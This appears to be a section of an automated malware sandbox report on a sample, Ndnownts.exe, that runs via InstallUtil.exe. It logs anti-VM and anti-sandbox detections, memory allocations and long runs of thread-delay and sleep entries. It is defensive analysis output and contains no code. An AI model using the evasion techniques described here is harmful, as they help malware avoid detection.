                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Ndnownts.exe PID: 4544, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: IsInvalid.exe PID: 3688, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: Ndnownts.exe, 00000000.00000002.1741258818.0000000002626000.00000004.00000800.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1926811297.0000000003016000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\Ndnownts.exeMemory allocated: B60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeMemory allocated: 4580000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1530000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2F70000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeMemory allocated: 1400000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeMemory allocated: 2F70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2260000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2470000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599107Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598435Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598199Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597968Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597748Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597297Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596514Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596090Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595947Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594390Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599657Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599532Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598813Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596591Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595499Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595032Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594907Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594782Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594063Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeWindow / User API: threadDelayed 7806Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeWindow / User API: threadDelayed 1356Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7943Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1904Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeWindow / User API: threadDelayed 3385Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeWindow / User API: threadDelayed 3266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7927Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1896Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 2124Thread sleep count: 7806 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 2124Thread sleep count: 1356 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -99867s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -99766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -99656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -99543s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -99438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -99313s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -99184s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -99078s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -98965s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -98857s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -98750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -98638s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -98528s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -98420s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -98313s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -98172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -98047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -97930s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -97828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -97719s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -97609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -97497s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -97391s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -97281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -97172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -97063s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -96953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -96844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -96734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -96625s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -96516s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -96406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -96297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -96188s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -96063s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -95938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -95813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -95703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -95594s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -95429s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -95327s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -95219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exe TID: 1804Thread sleep time: -95110s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2188Thread sleep count: 7943 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -599765s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2188Thread sleep count: 1904 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -599547s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -599437s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -599328s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -599219s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -599107s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -598984s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -598875s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -598765s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -598656s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -598547s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -598435s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -598312s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -598199s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -598078s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -597968s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -597859s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -597748s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -597625s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -597515s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -597406s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -597297s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -597187s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -597078s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -596969s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -596859s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -596750s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -596640s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -596514s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -596359s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -596204s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -596090s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -595947s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -595828s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -595719s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -595609s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -595500s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -595390s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -595281s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -595172s >= -30000sJump to behavior
